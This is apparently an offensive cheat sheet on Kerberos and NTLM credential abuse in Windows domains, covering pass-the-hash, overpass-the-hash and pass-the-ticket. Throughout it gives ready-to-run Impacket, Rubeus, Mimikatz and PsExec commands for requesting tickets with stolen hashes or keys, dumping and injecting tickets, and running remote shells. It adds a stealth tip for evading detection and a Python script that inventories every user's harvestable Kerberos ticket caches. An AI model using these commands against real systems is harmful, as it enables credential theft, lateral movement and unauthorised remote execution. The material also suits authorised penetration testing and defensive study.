Use Alternate Authentication Material

Pass the Hash

Overpass The Hash/Pass The Key (PTK)

Impacket

Request the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

Request the TGT with an AES key (stronger encryption and probably stealthier, since AES is the encryption type Windows uses for Kerberos by default, whereas an RC4/NTLM-keyed TGT request is what overpass-the-hash detections typically look for)

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

Set the TGT for impacket use

export KRB5CCNAME=<TGT_ccache_file>

Execute remote commands with any of the following, authenticating with the TGT (-k) instead of a password (-no-pass):

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Rubeus and PsExec

Request the TGT with the NTLM (RC4) hash and inject it into the current logon session (/ptt):

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Execute a cmd on the remote machine (the injected TGT is used for SMB authentication):

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Pass the Ticket

Pass The Ticket (PTT)

Harvest tickets from Linux

  • Check the type and location of the tickets:

    grep default_ccache_name /etc/krb5.conf

  • If nothing is returned, the default is FILE:/tmp/krb5cc_%{uid}.

  • If the tickets are files, you can copy them (given enough permissions) and use them.

  • If they are KEYRING tickets, use tickey to extract them:

cp tickey /tmp/tickey
/tmp/tickey -i
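The steps above amount to: read default_ccache_name from the [libdefaults] section of krb5.conf, fall back to FILE:/tmp/krb5cc_%{uid} when it is absent, expand the %{uid} template, and then decide from the credential cache type whether the tickets can simply be copied or need a tool such as tickey. The following helper is an added example, not part of the original page or of the tickey/Impacket projects; the krb5.conf snippets in it are constructed for illustration, and the hints per cache type are assumptions about what a harvester would do next.

```python
import os
import re
from dataclasses import dataclass

# Constructed sample configurations (not taken from a real host).
KRB5_CONF_KEYRING = """
[libdefaults]
    default_realm = CORP.LOCAL            ; assumed realm
    default_ccache_name = KEYRING:persistent:%{uid}

[realms]
    CORP.LOCAL = {
        kdc = dc01.corp.local
    }
"""

KRB5_CONF_NO_CCACHE = """
[libdefaults]
    default_realm = CORP.LOCAL
"""

# libkrb5 default when default_ccache_name is not configured.
DEFAULT_CCACHE = "FILE:/tmp/krb5cc_%{uid}"


def default_ccache_name(conf_text):
    """Return default_ccache_name from [libdefaults], or the libkrb5 default."""
    section = None
    for raw in conf_text.splitlines():
        # krb5.conf comments start with '#' or ';'
        line = re.split(r"[#;]", raw, 1)[0].strip()
        if not line:
            continue
        m = re.match(r"^\[(\w+)\]$", line)
        if m:
            section = m.group(1)
            continue
        if section == "libdefaults" and "=" in line:
            key, val = (p.strip() for p in line.split("=", 1))
            if key == "default_ccache_name":
                return val
    return DEFAULT_CCACHE


def expand_ccache(template, uid, username="user"):
    """Expand the krb5 parameter templates that appear in ccache names."""
    return (template.replace("%{uid}", str(uid))
                    .replace("%{euid}", str(uid))
                    .replace("%{username}", username))


@dataclass
class CcacheInfo:
    ctype: str      # FILE, DIR, KEYRING, KCM, MEMORY, ...
    location: str   # the part after "TYPE:"
    copyable: bool  # True when a plain file/dir can be copied with enough privileges
    hint: str       # assumed next step for a harvester


def classify_ccache(name):
    """Split 'TYPE:location' and say how the tickets can be harvested."""
    ctype, _, rest = name.partition(":")
    if not rest:                     # a bare path means a FILE cache
        ctype, rest = "FILE", name
    ctype = ctype.upper()
    hints = {
        "FILE": (True, "copy the file, then export KRB5CCNAME to the copy"),
        "DIR": (True, "copy the directory; each tkt* file inside is a ccache"),
        "KEYRING": (False, "kernel keyring: extract with tickey (tickey -i)"),
        "KCM": (False, "held by the KCM daemon (sssd), not a file on disk"),
        "MEMORY": (False, "process memory only, nothing to copy from disk"),
    }
    copyable, hint = hints.get(ctype, (False, "unknown ccache type"))
    return CcacheInfo(ctype, rest, copyable, hint)


def find_file_ccaches(directory="/tmp"):
    """List FILE caches of every user in a directory (what 'ls /tmp/krb5cc_*' shows)."""
    found = []
    try:
        entries = os.scandir(directory)
    except OSError:
        return found
    with entries:
        for entry in entries:
            if entry.is_file(follow_symlinks=False) and entry.name.startswith("krb5cc_"):
                st = entry.stat(follow_symlinks=False)
                found.append((entry.path, st.st_uid, st.st_size))
    return found


if __name__ == "__main__":
    for conf in (KRB5_CONF_KEYRING, KRB5_CONF_NO_CCACHE):
        name = expand_ccache(default_ccache_name(conf), os.getuid())
        print(name, "->", classify_ccache(name))
    for path, uid, size in find_file_ccaches():
        print(f"{path}  uid={uid}  {size} bytes")
```

Run it as root (or as any user that can read other users' caches) to get a quick inventory of what is harvestable before copying anything.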

Harvest tickets from Windows

With Mimikatz:

mimikatz # sekurlsa::tickets /export

With Rubeus from PowerShell:

.\Rubeus.exe dump

Rubeus prints the dumped tickets as base64; decode that output into a .kirbi file before converting or injecting it.

To convert tickets between the Windows (.kirbi) and Linux (.ccache) formats with ticket_converter.py:

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

Set the ticket for impacket use

export KRB5CCNAME=<TGT_ccache_file_path>

Execute remote commands with any of the following, authenticating with the ticket (-k) instead of a password (-no-pass):

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using ticket in Windows

Inject ticket with Mimikatz:

mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd on the remote machine with PsExec (the injected ticket is used for SMB authentication):

.\PsExec.exe -accepteula \\<remote_hostname> cmd